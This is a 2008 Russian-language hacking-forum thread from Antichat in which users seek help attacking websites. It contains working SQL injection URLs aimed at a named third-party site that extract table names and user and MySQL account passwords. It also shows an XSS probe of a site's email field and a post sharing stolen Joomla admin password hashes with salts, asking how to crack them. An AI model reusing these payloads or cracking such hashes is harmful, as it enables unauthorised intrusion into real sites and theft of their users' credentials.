ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.08.2008, 15:41
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
ТОварисчи есть ли методы обхода mod-rewrite,а то скуль нашел.Гуглил.
|
|
|
16.08.2008, 16:44
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
сегодня гуляя по сайте наткнулся на такое...
Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151
интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
|
|
|
|
16.08.2008, 16:49
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от Taylorith
сегодня гуляя по сайте наткнулся на такое...
Warning: mysql_query() [function.mysql-query]: Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /srv/www/site/config.php on line 150
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /srv/www/site/config.php on line 151
интересно .. прочитал пару факов и думаю что мона провести инхекцию, но к сожалению прикол в том что я даже не вводил в запрос никаких ковычек типа ' , сама страниа так секбя ведет, значит непосредственно в коде ошибка, ну это ладно ,переживу... главное вот что , адрес ошибки вот такой...
http://www.site.com/faq.html никаких данных не передается, и как мне провести инхекцию?
>> Access denied for user 'lighttpd'@'localhost' (using password: NO) in /srv/www/site/config.php on line 150
Нету доступа к мускулю. Это не уязвимость.
|
|
|
|
16.08.2008, 17:04
|
|
Участник форума
Регистрация: 06.09.2006
Сообщений: 177
Провел на форуме:
284125
Репутация:
16
|
|
ясн спасибо
|
|
|
|
17.08.2008, 01:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://www.combined.biz/portfolio_details.php?id=-1+union+select+1,table_name,3,4,5,6+from+informati on_schema.tables--
какие мысли ?
|
|
|
|
17.08.2008, 01:32
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
Да что то информатион_схема недоступна.
Но мысли есть вот такие
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user_name)),6,7+from+us er
Вдогонку
http://www.combined.biz/news_article.php?id=999999+union+select+1,UNHEX(HE X(password)),3,4,UNHEX(HEX(user)),6,7+from+mysql.u ser+limit+0,1
Последний раз редактировалось Red_Red1; 17.08.2008 в 01:41..
|
|
|
|
17.08.2008, 07:14
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
это понятно..) я про information_schema спрашивал. всеровно спс.)
ап
Последний раз редактировалось sabe; 17.08.2008 в 20:21..
|
|
|
|
17.08.2008, 08:05
|
|
Новичок
Регистрация: 18.07.2008
Сообщений: 12
Провел на форуме:
99313
Репутация:
3
|
|
Вопросик, сидел вводил всякое в поисках XSS. Ввел полную белеберду в поле ввода мыла
bla'<script>alert()</script>
получил переадресацию на другой сайт.
alert()> вылезло за пределы поля для ввода текста </script скушало. А вверху закрасовалось вот такая ошибка БД:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 176
Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in /home/www/htdocs/include/funcs_user.inc on line 181
Это уязвимость? Или просто тупой глюк? |
|
|
|
17.08.2008, 08:07
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
' ? = sql inj
|
|
|
|
17.08.2008, 09:02
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Достал я парол я хэши из джумлы
admin:6f0f0e2db9c8f58e2b309afa6569f744  SX0uUSDl4I rdL63
или
admin:68356d102feeaf197f4fd0c4dda59ed8:2K70yZkYvva P7o9I
а как его рассшифровать?
где сервисы? просто md5 не помогает тут он какойто хитрожопый
как такое расшифровывать? |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
